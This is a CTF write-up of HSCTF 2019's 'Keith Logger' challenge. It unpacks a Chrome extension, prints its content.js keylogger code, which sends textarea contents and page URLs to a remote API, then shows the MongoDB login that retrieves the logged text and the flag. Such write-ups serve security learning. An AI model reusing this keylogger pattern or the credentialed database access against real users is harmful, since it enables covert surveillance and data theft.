Tags: web 

Rating: 0

# Keith Logger

```
Keith is up to some evil stuff! Can you figure out what he's doing and find the flag?

Note: nothing is actually saved
```

(File(s): attachments/extension.crx)

We're given a Chrome extension. Something to note about `.crx` files is that, similar to `.apk` files, they're really just zips. As such, we can just unzip them.

```
$ unzip extension.crx
Archive: extension.crx
warning [extension.crx]: 593 extra bytes at beginning or within zipfile
(attempting to process anyway)
inflating: jquery-3.3.1.min.js
inflating: manifest.json
inflating: content.js
```

Let's have a look at the `content.js`.

```javascript
var timeout_textarea;
var xhr_textarea;

$("textarea").on("keyup", function() {
if (timeout_textarea) {
clearTimeout(timeout_textarea);
}

if (xhr_textarea) {
xhr_textarea.abort();
}

timeout_textarea = setTimeout(function() {
var xhr = new XMLHttpRequest();
/*
xhr.open(
"GET",
"https://keith-logger.web.chal.hsctf.com/api/record?text=" +
encodeURIComponent($("textarea").val()) +
"&url=" + encodeURIComponent(window.location.href),
true
);*/

// send a request to admin whenever something is logged, not needed anymore after testing
/*
xhr.open(
"GET",
"https://keith-logger.web.chal.hsctf.com/api/admin",
true
);*/

xhr.send();
}, 2000);
});
```

Looks like we found the API page: https://keith-logger.web.chal.hsctf.com/api/admin

Let's give it a visit.

![](https://raw.githubusercontent.com/shawnduong/ctf-writeups/master/2019-HSCTF6/images/keith-logger-1.png)

Looks like we found the MongoDB server. Let's go ahead and connect to it to get the flag.

```
$ mongo keith-logger-mongodb.web.chal.hsctf.com:27017 -u admin -p keithkeithkeith --authenticationDatabase "admin"
MongoDB shell version v4.0.10
connecting to: mongodb://keith-logger-mongodb.web.chal.hsctf.com:27017/test?authSource=admin&gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("05235c05-5480-45f1-a5af-b540d8335c38") }
MongoDB server version: 4.0.10
> use database
switched to db database
> show collections
collection
> db.collection.find()
{ "_id" : ObjectId("5cf0512d464d9fe1d9915fbd"), "text" : "are kitties cool", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:54:53.925045" }
{ "_id" : ObjectId("5cf051a95501f2901a915fbd"), "text" : "because i think they are", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:56:57.974856" }
{ "_id" : ObjectId("5cf051b3464d9fe1d9915fbe"), "text" : "meow! :3", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:57:07.295378" }
{ "_id" : ObjectId("5cf0520b464d9fe1d9915fbf"), "text" : "meow! :3", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:58:35.030635" }
{ "_id" : ObjectId("5cf05212464d9fe1d9915fc0"), "text" : "if you're looking for the flag", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:58:42.170470" }
{ "_id" : ObjectId("5cf0521b5501f2901a915fbe"), "text" : "it's hsctf{watch_out_for_keyloggers}", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:58:51.359556" }
```

Found the flag.

```
hsctf{watch_out_for_keyloggers}
```